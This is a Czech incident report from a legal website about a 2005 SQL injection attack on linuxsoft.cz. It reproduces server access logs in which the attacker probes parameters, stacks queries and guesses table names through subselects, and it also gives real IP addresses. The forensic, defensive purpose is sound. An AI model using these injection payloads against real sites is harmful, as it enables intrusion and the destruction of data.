zakony-online.cz

Počítačový útok

Dne 5.12.2005 byl napaden linuxový server www.linuxsoft.cz neznámým útočníkem, který zneužitím chyby v kódu webu (SQL injection) smazal z veřejného webu několik set odborných článků a 10.000 softwarových záznamů.
Viz diskuze k tomuto případu.
Z logů serveru byli zjištěny IP adresy, ze kterých se útočník připojoval, včetně jedné patřící ADSL přípojení od společnosti Bluetone (České radiokomunikace).
Připravujeme trestní oznámení na neznámého pachatele pravděpodobně pro porušení zákona dle (trestní zákon § 149)

Kdo jednáním, které je v rozporu s předpisy upravujícími soutěž v hospodářském styku nebo se zvyklostmi soutěže, poškodí dobrou pověst nebo ohrozí chod nebo rozvoj podniku soutěžitele, bude potrestán odnětím svobody až na jeden rok nebo peněžitým trestem nebo propadnutím věci.

Na popisu případu se pracuje, bude jistě velmi zajímavé sledovat postup Policie ČR v případu vyšetřování případu počitačové kriminality.


Zpráva o bezpečnostním incidentu ze dne 5.12.2005, www.linuxsoft.cz

Úvod

V pondělí 5. prosince 2005 útočník neoprávněně manipuloval tabulkami v databázi, které jsou zásadní pro správný běh webových stránek. Jejich úpravou došlo k praktické nepoužitelnosti webu a sitace vyžadovala okamžité řešení.

Zjištění

Kolem 16. hodiny došlo k poškození webu www.linuxsoft.cz[1], fungovaly pouze diskuze, kam útočník poslal své oznámení o zneužití. Po pár desítkách minut začala být situace řešena – proběhla záloha systémových logů a programátor začal s analýzou problému. Z logů webového serveru byl zjištěn útok typu "SQL injection(*)" přes jeden z nezabezpečených PHP skiptů, chyba byla napravena a databáze byla obnovena.

Útok a zjištěné stopy

5. prosince ve 13:12:56 kdosi přistoupil na stránku vygenerovanou nezabezpečeným skriptem z webového klienta emailů (pravděpodobně to znamená, že na danou nezabezpečenou stránku útočníka pravděpodobně někdo další upozornil).

84.244.83.151 - - [05/Dec/2005:13:12:56 +0100] "GET /script_list.php?id_kategory=157a HTTP/1.1" 200 54648 "http://mail.google.com/mail/?&ik=a3f28d5cef&view=cv&search=inbox&th=107dd15405971c4f&lvp=-1&cvp=1&qt=&qt=&zx=7hhonz-9hrr01" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.2) Gecko/20040906"

Po cca 20 minutách začal vlastní útok, také z IP adresy (která je podle všeho také od Bluetone) a po zjištění slabiny byl na podobný problém prohledán skoro celý web.

212.158.128.159 - - [05/Dec/2005:13:29:05 +0100] "GET /script_list.php?id_kategory=157a HTTP/1.0" 200 54606 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:29:39 +0100] "GET /script_list.php?id_kategory=(SELECT%20157) HTTP/1.0" 200 59123 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:29:50 +0100] "GET /script_list.php?id_kategory=(SELECT%20157a) HTTP/1.0" 200 54626 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:31:25 +0100] "GET /script_list.php?id_kategory=(SELECT%20157a) HTTP/1.0" 200 54626 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:31:41 +0100] "GET /script_list.php?id_kategory=157;%20SELECT%20157 HTTP/1.0" 200 54628 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:32:37 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:54:34 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:55:43 +0100] "GET /prispevek_edit.php?predek=0&id_vazba=3232&type_item=7 HTTP/1.0" 200 54100 "http://www.linuxsoft.cz/script_list.php?id_kategory=157));%20SELECT%20157%20WHERE%201=((1" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:55:58 +0100] "GET /prispevek_edit.php?predek=0&id_vazba=3232e&type_item=7 HTTP/1.0" 200 54100 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:56:12 +0100] "GET /prispevek_edit.php?predek=0&id_vazba=3232e&type_item=7e HTTP/1.0" 200 54100 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:56:27 +0100] "POST /login.php HTTP/1.0" 302 0 "http://www.linuxsoft.cz/prispevek_edit.php?predek=0&id_vazba=3232e&type_item=7e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:56:30 +0100] "GET /error.php?error=3 HTTP/1.0" 200 54731 "http://www.linuxsoft.cz/prispevek_edit.php?predek=0&id_vazba=3232e&type_item=7e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:56:43 +0100] "POST /login.php HTTP/1.0" 302 0 "http://www.linuxsoft.cz/error.php?error=3" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:56:45 +0100] "GET /error.php?error=3 HTTP/1.0" 200 54731 "http://www.linuxsoft.cz/error.php?error=3" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:56:59 +0100] "GET /zapomenka.php?vorgotten_email=ovlach%40nanobyte.cz&tlacbitko=Odeslat HTTP/1.0" 302 0 "http://www.linuxsoft.cz/error.php?error=3" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:08 +0100] "GET /error.php?error=8 HTTP/1.0" 200 54135 "http://www.linuxsoft.cz/error.php?error=3" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:16 +0100] "GET /error.php?error=8e HTTP/1.0" 200 53805 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:38 +0100] "GET /shop/?sestava=2 HTTP/1.0" 200 8074 "http://www.linuxsoft.cz/error.php?error=8e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:39 +0100] "GET /shop/img/onstock_yes.gif HTTP/1.0" 200 152 "http://www.linuxsoft.cz/shop/?sestava=2" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:39 +0100] "GET /shop/img/onstock_no.gif HTTP/1.0" 200 1062 "http://www.linuxsoft.cz/shop/?sestava=2" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:44 +0100] "GET /shop/?sestava=2e HTTP/1.0" 200 5756 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:52 +0100] "GET /shop/?sestava=2 HTTP/1.0" 200 8074 "http://www.linuxsoft.cz/shop/?sestava=2e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:57:58 +0100] "GET /shop/?produkt=3956 HTTP/1.0" 200 7761 "http://www.linuxsoft.cz/shop/?sestava=2" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:02 +0100] "GET /shop/img/3956.jpg HTTP/1.0" 200 7631 "http://www.linuxsoft.cz/shop/?produkt=3956" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:06 +0100] "GET /shop/?produkt=3956z HTTP/1.0" 200 18817 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:06 +0100] "GET /shop/img/amd2.jpeg HTTP/1.0" 200 2633 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:06 +0100] "GET /shop/img/ram2.jpeg HTTP/1.0" 200 1709 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:06 +0100] "GET /shop/img/mb2.jpeg HTTP/1.0" 200 4623 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:06 +0100] "GET /shop/img/case2.jpeg HTTP/1.0" 200 1936 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:06 +0100] "GET /shop/img/hdd2.jpeg HTTP/1.0" 200 2636 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/matrox2.jpeg HTTP/1.0" 200 3349 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/lcd2.jpeg HTTP/1.0" 200 2387 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/acernew.jpeg HTTP/1.0" 200 2304 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/pda2.jpeg HTTP/1.0" 200 2425 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/projektory.jpeg HTTP/1.0" 200 2184 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/hp2.jpeg HTTP/1.0" 200 2145 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/digi2.jpeg HTTP/1.0" 200 2044 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/faxnew.jpeg HTTP/1.0" 200 1940 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/sun2.jpg HTTP/1.0" 200 2198 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/suse.png HTTP/1.0" 404 322 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/knoppix.png HTTP/1.0" 200 4205 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/key2.jpeg HTTP/1.0" 200 2080 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:07 +0100] "GET /shop/img/repro2.jpeg HTTP/1.0" 200 2196 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:08 +0100] "GET /shop/img/dvdnew.jpg HTTP/1.0" 200 1773 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:08 +0100] "GET /shop/img/dvd2.jpeg HTTP/1.0" 200 2165 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:08 +0100] "GET /shop/img/mp32.jpeg HTTP/1.0" 200 1857 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:08 +0100] "GET /shop/img/cd2.jpeg HTTP/1.0" 200 3158 "http://www.linuxsoft.cz/shop/?produkt=3956z" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:18 +0100] "GET /shop/?produkt=3956'%22e HTTP/1.0" 200 18817 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET / HTTP/1.0" 200 71629 "http://www.linuxsoft.cz/shop/?produkt=3956'%22e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET /img/banner_linuxsoft_kurzy.gif HTTP/1.0" 200 11689 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET /img/sipka1.png HTTP/1.0" 200 163 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET /img/archlinux/archlinux_logo.png HTTP/1.0" 200 3774 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET /img/emulators_2/commodore_logo.png HTTP/1.0" 200 1869 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET /img/notebook/icon_ntbk.png HTTP/1.0" 200 2117 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:28 +0100] "GET /img/rr4/rr4_logo.png HTTP/1.0" 200 2178 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:37 +0100] "GET /css/article.css HTTP/1.0" 200 412 "http://www.linuxsoft.cz/article.php?id_article=1029" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:40 +0100] "GET /article.php?id_article=1029 HTTP/1.0" 200 80250 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:41 +0100] "GET /img/banner_liberix2.gif HTTP/1.0" 200 30422 "http://www.linuxsoft.cz/article.php?id_article=1029" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:51 +0100] "GET /article.php?id_article=1029w HTTP/1.0" 200 54524 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:58:53 +0100] "GET /img/plc-468x60-ban-anim-2.gif HTTP/1.0" 200 15261 "http://www.linuxsoft.cz/article.php?id_article=1029w" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:02 +0100] "GET /article.php?id_article=1029w'%22 HTTP/1.0" 200 54485 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:07 +0100] "GET /img/banner_468x60.gif HTTP/1.0" 200 39517 "http://www.linuxsoft.cz/article.php?id_article=1029w'%22" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:10 +0100] "GET /article.php?id_article=1029w'%22e HTTP/1.0" 200 54699 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:11 +0100] "GET /img/bsod6_468x60.en.gif HTTP/1.0" 200 5198 "http://www.linuxsoft.cz/article.php?id_article=1029w'%22e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:21 +0100] "POST /login.php HTTP/1.0" 302 0 "http://www.linuxsoft.cz/article.php?id_article=1029w'%22e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:24 +0100] "GET /error.php?error=3 HTTP/1.0" 200 54916 "http://www.linuxsoft.cz/article.php?id_article=1029w'%22e" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:36 +0100] "GET /sw_list.php?id_kategory=120 HTTP/1.0" 200 60260 "http://www.linuxsoft.cz/error.php?error=3" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:13:59:40 +0100] "GET /sw_list.php?id_kategory=120e HTTP/1.0" 200 60260 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:00:22 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20users) HTTP/1.0" 200 54902 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:00:41 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20users%20LIMIT%201) HTTP/1.0" 200 54239 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:01:00 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20articles%20LIMIT%201) HTTP/1.0" 200 54812 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:01:18 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20items%20LIMIT%201) HTTP/1.0" 200 54794 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:01:36 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20shop%20LIMIT%201) HTTP/1.0" 200 54788 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:01:54 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20shop_items%20LIMIT%201) HTTP/1.0" 200 54824 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:02:13 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20sestavy%20LIMIT%201) HTTP/1.0" 200 54806 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:02:26 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20sestava%20LIMIT%201) HTTP/1.0" 200 54806 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:02:53 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20kurzy%20LIMIT%201) HTTP/1.0" 200 54794 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:03:05 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20sw%20LIMIT%201) HTTP/1.0" 200 54776 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:03:21 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20clanky%20LIMIT%201) HTTP/1.0" 200 54800 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:03:48 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20clanek%20LIMIT%201) HTTP/1.0" 200 54800 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:03:57 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20articles%20LIMIT%201) HTTP/1.0" 200 54812 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:04:09 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20article%20LIMIT%201) HTTP/1.0" 200 54239 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:04:46 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20menu%20LIMIT%201) HTTP/1.0" 200 54788 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:05:04 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20directory%20LIMIT%201) HTTP/1.0" 200 54818 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:05:20 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20templates%20LIMIT%201) HTTP/1.0" 200 54818 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:05:51 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20news%20LIMIT%201) HTTP/1.0" 200 54788 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:06:09 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20novinky%20LIMIT%201) HTTP/1.0" 200 54806 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:06:36 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20linux_news%20LIMIT%201) HTTP/1.0" 200 54824 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:06:57 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20produkty%20LIMIT%201) HTTP/1.0" 200 54812 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:07:27 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20facts%20LIMIT%201) HTTP/1.0" 200 54794 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:07:40 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20fakta%20LIMIT%201) HTTP/1.0" 200 54794 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:08:08 +0100] "GET /script_list.php?id_kategory=(SELECT%20id%20FROM%20distros%20LIMIT%201) HTTP/1.0" 200 54806 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:24:20 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57422 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:27:17 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=(1 HTTP/1.0" 200 54898 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:27:37 +0100] "GET /script_list.php?id_kategory=157e HTTP/1.0" 200 54792 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:27:49 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=(1 HTTP/1.0" 200 54898 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:28:06 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57422 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:34:19 +0100] "GET /img/dds-468x60.gif HTTP/1.0" 200 7127 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:34:20 +0100] "GET / HTTP/1.0" 200 71794 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
